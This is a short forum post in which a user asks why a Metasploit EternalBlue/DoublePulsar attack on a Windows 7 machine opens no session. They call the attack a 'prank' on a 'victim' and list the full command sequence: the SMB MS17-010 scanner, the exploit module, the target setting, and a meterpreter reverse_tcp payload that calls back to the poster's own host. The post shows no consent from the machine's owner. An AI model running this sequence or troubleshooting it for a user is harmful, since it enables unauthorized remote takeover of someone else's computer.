Hey guys , I'm trying to use eternal blue to hack a computer nothing illegal it's for a prank but when i click exploit it says exploit completed but no session was created. I followed some video on youtube and typed:
use auxiliary/scanner/smb/smbms17010
set rhosts (victim's ipv4 adress)
exploit
use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
set ETERNALBLUEPATH/root/Eternalblue-Doublepulsar-Metasploit/deps/
set rhost (victim's ipv4 address)
show targets
set target 8
set payload windows/meterpreter/reverse_tcp
set LHOST (my ipv4 address)
exploit .
And after this everything goes smoothly but in the end says exploit completed but no session was created
it was running on port 445 and i checked and this port was open on the victim computer it is running windows 7 32 bit. If anyone knows anything about it please help i tried searching on the internet but it didn't work. Thanks
Comments
No Comments Exist
Be the first, drop a comment!